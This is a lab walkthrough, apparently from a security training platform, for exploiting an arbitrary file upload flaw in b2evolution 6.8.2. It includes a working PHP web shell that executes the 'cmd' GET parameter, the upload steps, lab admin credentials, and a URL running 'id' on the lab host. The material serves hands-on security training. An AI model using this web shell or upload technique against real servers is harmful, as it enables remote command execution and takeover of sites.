Name B2Evolution

URL https://www.attackdefense.com/challengedetails?cid=27

Type Real World Webapps : File Upload

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Solution:

Step 1: ​Inspect the web application.

Step 2: ​Search on google “B2Evolution file upload” and look for publically available exploits.

The exploit db link contains the steps to be followed in order to exploit the vulnerability.

Exploit DB Link: ​https://www.exploit-db.com/exploits/41011

Step 3: ​The user has to authenticate in order to exploit the vulnerability. Login to the web
application and navigate to the URL provided at exploit db link.

Click on the “Log in” button on the top right corner and login to the web application. The login
credential of the web application is provided in the challenge description.

● Username: admin
● Password: ​zMWWcUrwdNB

Admin Dashboard:
Navigate to the vulnerable web page.

URL:
http://16cyp8fom8zkvgfpt897ok1ed.asia.attackdefenselabs.com/index.php/a/extended-post
Scroll down to the comment section.

Step 4: ​Create a PHP web shell.

Save the below given php script as “shell.php”

<?php
$output = shell_exec($_GET["cmd"]);
echo "<pre>$output</pre>";
?>

Command: ​cat ~/Downloads/shell.php

Step 5: ​Click on the “Choose File” button and upload the PHP web shell.

Click on the “Preview/Add file” button.

Preview:

Open the hyperlink “shell.php” in a new tab.

The content of PHP file is displayed on the web page. A script process the uploaded file and
displays its content. The uploaded PHP web shell is stored somewhere on the webserver.

The path parameter has value “comments/p19/shell.php”

Step 6: ​Find the location of the uploaded file.

Scroll down, upload an image and find the location where the image is stored on the web
server.
Click on the “Choose File” button and upload an image.
Click on the “Preview/Add file” button.
Right click on the image and open it a new tab.

The image is stored in the directory “media/users/admin/comments/p19” on the web server.

Since the value of path variable had value “comments/p19/shell.php”, it can be concluded that
the uploaded files are stored in the directory “media/users/admin/comments/p19” on the web
server.

Step 7: ​Access the uploaded web shell.

URL:
http://16cyp8fom8zkvgfpt897ok1ed.asia.attackdefenselabs.com/media/users/admin/comments/
p19/shell.php

No output is returned since the cmd parameter was not passed.

Step 8: ​Execute system commands through “cmd” GET parameter.

Command: ​id

URL:
http://16cyp8fom8zkvgfpt897ok1ed.asia.attackdefenselabs.com/media/users/admin/comments/
p19/shell.php?cmd=id

The “id” command was executed on the web server and the output was dumped on the web
page.

References:

1. b2evolution (​https://b2evolution.net/​)
2. b2evolution 6.8.2 - Arbitrary File Upload (​https://www.exploit-db.com/exploits/41011​)